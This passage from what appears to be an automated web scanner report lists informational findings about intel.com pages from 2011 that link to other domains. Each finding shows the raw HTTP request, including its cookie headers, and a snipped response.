s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 200 OK
Server: IA Web Server
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
Content-Type: text/html
Date: Sat, 05 Feb 2011 23:19:58 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 44191


           <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">

...[SNIP]...
</script>
<link rel="stylesheet" type="text/css" href="http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.6/themes/start/jquery-ui.css" />
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.6/jquery-ui.min.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://use.typekit.com/yhr6rfe.js"></script>
...[SNIP]...
<li><a href="http://www.intc.com/index.cfm?iid=ftr+invrel">Investor Relations</a>
...[SNIP]...

17.73. http://www.intel.com/consumer/products/smarttv/index.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intel.com
Path:   /consumer/products/smarttv/index.htm

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.intel.com/consumer/products/smarttv/index.htm?iid=gg_prod-en_US+smarttv
The response contains the following link to another domain:
  • http://www.intc.com/index.cfm?iid=ftr+invrel

Request

GET /consumer/products/smarttv/index.htm?iid=gg_prod-en_US+smarttv HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 200 OK
Server: IA Web Server
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
Content-Type: text/html
Date: Sat, 05 Feb 2011 23:19:59 GMT
Content-Length: 31774
Connection: close


           <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">

...[SNIP]...
<li><a href="http://www.intc.com/index.cfm?iid=ftr+invrel">Investor Relations</a>
...[SNIP]...

17.74. http://www.intel.com/consumer/products/technology/index.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intel.com
Path:   /consumer/products/technology/index.htm

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.intel.com/consumer/products/technology/index.htm?iid=subhdr+products_tech
The response contains the following links to other domains:
  • http://use.typekit.com/yhr6rfe.js
  • http://www.intc.com/index.cfm?iid=ftr+invrel

Request

GET /consumer/products/technology/index.htm?iid=subhdr+products_tech HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 200 OK
Server: IA Web Server
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
Content-Type: text/html
Date: Sat, 05 Feb 2011 23:19:59 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 36094


           <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">

...[SNIP]...
</script>

<script type="text/javascript" src="http://use.typekit.com/yhr6rfe.js"></script>
...[SNIP]...
<li><a href="http://www.intc.com/index.cfm?iid=ftr+invrel">Investor Relations</a>
...[SNIP]...

17.75. http://www.intel.com/consumer/shop/processors/index.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intel.com
Path:   /consumer/shop/processors/index.htm

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.intel.com/consumer/shop/processors/index.htm?iid=subhdr+shop_proc
The response contains the following links to other domains:
  • http://content.channelintelligence.com/scripts/cii_embeddedfunctions.asp
  • http://content.channelintelligence.com/scripts/ykb_PopupWindow.js
  • http://www.intc.com/index.cfm?iid=ftr+invrel

Request

GET /consumer/shop/processors/index.htm?iid=subhdr+shop_proc HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 200 OK
Server: IA Web Server
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
Content-Type: text/html
Date: Sat, 05 Feb 2011 23:20:06 GMT
Content-Length: 29190
Connection: close


           <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">

...[SNIP]...
<td width="567" valign="top">
<script language="JavaScript" src="http://content.channelintelligence.com/scripts/ykb_PopupWindow.js" type="text/javascript"></script>
<script language="JavaScript" src="http://content.channelintelligence.com/scripts/cii_embeddedfunctions.asp" type="text/javascript"></script>
...[SNIP]...
<li><a href="http://www.intc.com/index.cfm?iid=ftr+invrel">Investor Relations</a>
...[SNIP]...

17.76. http://www.intel.com/consumer/shop/service-providers.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intel.com
Path:   /consumer/shop/service-providers.htm

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.intel.com/consumer/shop/service-providers.htm?iid=subhdr+shop_serviceproviders
The response contains the following link to another domain:
  • http://www.intc.com/index.cfm?iid=ftr+invrel

Request

GET /consumer/shop/service-providers.htm?iid=subhdr+shop_serviceproviders HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 200 OK
Server: IA Web Server
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
Content-Type: text/html
Date: Sat, 05 Feb 2011 23:20:06 GMT
Content-Length: 32458
Connection: close


           <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">

...[SNIP]...
<li><a href="http://www.intc.com/index.cfm?iid=ftr+invrel">Investor Relations</a>
...[SNIP]...

17.77. http://www.intel.com/consumer/shop/ssds.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intel.com
Path:   /consumer/shop/ssds.htm

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.intel.com/consumer/shop/ssds.htm?iid=subhdr+shop_storage
The response contains the following links to other domains:
  • http://content.channelintelligence.com/scripts/cii_embeddedfunctions.asp
  • http://content.channelintelligence.com/scripts/ykb_PopupWindow.js
  • http://www.intc.com/index.cfm?iid=ftr+invrel

Request

GET /consumer/shop/ssds.htm?iid=subhdr+shop_storage HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 200 OK
Server: IA Web Server
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
Content-Type: text/html
Date: Sat, 05 Feb 2011 23:20:06 GMT
Content-Length: 27030
Connection: close


           <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">

...[SNIP]...
<td width="567" valign="top">
<script language="JavaScript" src="http://content.channelintelligence.com/scripts/ykb_PopupWindow.js" type="text/javascript"></script>
<script language="JavaScript" src="http://content.channelintelligence.com/scripts/cii_embeddedfunctions.asp" type="text/javascript"></script>
...[SNIP]...
<li><a href="http://www.intc.com/index.cfm?iid=ftr+invrel">Investor Relations</a>
...[SNIP]...

17.78. http://www.intel.com/consumer/tomorrow/index.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intel.com
Path:   /consumer/tomorrow/index.htm

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.intel.com/consumer/tomorrow/index.htm?iid=gg_play+home_sot
The response contains the following link to another domain:
  • http://www.intc.com/index.cfm?iid=ftr+invrel

Request

GET /consumer/tomorrow/index.htm?iid=gg_play+home_sot HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 200 OK
Server: IA Web Server
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
Content-Type: text/html
Date: Sat, 05 Feb 2011 23:20:05 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 36511


           <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">

...[SNIP]...
<li><a href="http://www.intc.com/index.cfm?iid=ftr+invrel">Investor Relations</a>
...[SNIP]...

17.79. http://www.intel.com/consumer/tomorrow/innovators/index.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intel.com
Path:   /consumer/tomorrow/innovators/index.htm

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.intel.com/consumer/tomorrow/innovators/index.htm?iid=subhdr+sot_innovators
The response contains the following link to another domain:
  • http://www.intc.com/index.cfm?iid=ftr+invrel

Request

GET /consumer/tomorrow/innovators/index.htm?iid=subhdr+sot_innovators HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 200 OK
Server: IA Web Server
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
Content-Type: text/html
Date: Sat, 05 Feb 2011 23:20:05 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 36041


           <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">

...[SNIP]...
<li><a href="http://www.intc.com/index.cfm?iid=ftr+invrel">Investor Relations</a>
...[SNIP]...

17.80. http://www.intel.com/consumer/tomorrow/stories/index.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intel.com
Path:   /consumer/tomorrow/stories/index.htm

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.intel.com/consumer/tomorrow/stories/index.htm?iid=subhdr+sot_inteltoday
The response contains the following link to another domain:
  • http://www.intc.com/index.cfm?iid=ftr+invrel

Request

GET /consumer/tomorrow/stories/index.htm?iid=subhdr+sot_inteltoday HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; 